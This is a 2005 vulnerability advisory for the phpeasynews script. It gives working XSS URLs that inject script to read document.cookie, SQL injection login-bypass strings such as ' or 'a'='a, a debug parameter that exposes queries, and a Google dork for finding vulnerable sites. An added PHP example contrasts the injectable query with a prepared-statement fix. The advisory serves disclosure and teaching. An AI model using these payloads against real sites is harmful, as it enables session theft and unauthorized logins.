31/07/2005 0.17.53

phpeasynews v1.13 RC2 (possibly prior versions)
cross site scripting, path disclosure, user check bypass

author site:
http://www.brettjenkins.co.uk/

xss:

http://[target]/[path]/includes/css.php?css_tableheader=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_tablemain=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_na_writtenbyonat=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_hyperlink=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_hyperlink_hover=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/footer.php?pen_version_number=<script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/footer.php?pen_website_url=<script>alert(document.cookie)</script><!--


path disclosure:

logging in with a ' character in the username reveals the full path of the application


user check bypass (sql injection):

if magic_quotes is off, you can always login with username: ' or 'a'='a
(at line 114 we have:
$query = "SELECT * FROM $PEN_DB_TABLE3 WHERE username = '$submittedusername'";
which becomes:
SELECT * FROM pen_users WHERE username = '' or 'a'='a'
and is always true...)
however, the same cannot be done with the password, so in practice
one of the admin users, if created, can login as an invisible user
named "'or 'a'='a"
or "'or isnull(1/0) or 'a'='a"
etc.
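
as an added example (not phpeasynews code), the line 114 query as quoted above next to a hardened version that binds the username with a mysqli prepared statement; the pen_users table name, a password column holding a password_hash() value and the $db connection are assumptions for illustration.

```php
<?php
// Added illustration, not code from phpeasynews. Table name, password column
// and the $db connection are assumed for the sake of the example.

// Vulnerable form (as quoted in the advisory): the submitted username is
// interpolated straight into the SQL string. With magic_quotes off, a value
// like  ' or 'a'='a  turns the WHERE clause into a tautology.
function find_user_vulnerable(mysqli $db, string $table, string $submittedusername): ?array
{
    $query = "SELECT * FROM $table WHERE username = '$submittedusername'";
    $result = $db->query($query);
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// Hardened form: the username travels as a bound parameter, so a quote
// character is data, never SQL. A table name cannot be bound, so it is
// checked against an allow-list (assumed: only pen_users) before use.
function find_user_hardened(mysqli $db, string $table, string $submittedusername): ?array
{
    if (!in_array($table, ['pen_users'], true)) {
        throw new InvalidArgumentException('unexpected table name');
    }
    $stmt = $db->prepare("SELECT * FROM `$table` WHERE username = ?");
    $stmt->bind_param('s', $submittedusername);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Login check: look the account up by username only, then compare the
// password against a stored hash in PHP, so neither value reaches the SQL
// text and a tautology in either field matches no real account.
function login(mysqli $db, string $username, string $password): bool
{
    $row = find_user_hardened($db, 'pen_users', $username);
    return $row !== null && password_verify($password, $row['password']);
}
```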

debug mode:

query contents are shown whenever the $debug variable is set, for example:
http://[target]/[path]/admin.php?debug=1


googledork:

"Powered By: PHPeasynews"

the author has been contacted

rgod
email: retrogod at aliceposta it
site: http://rgod.altervista.org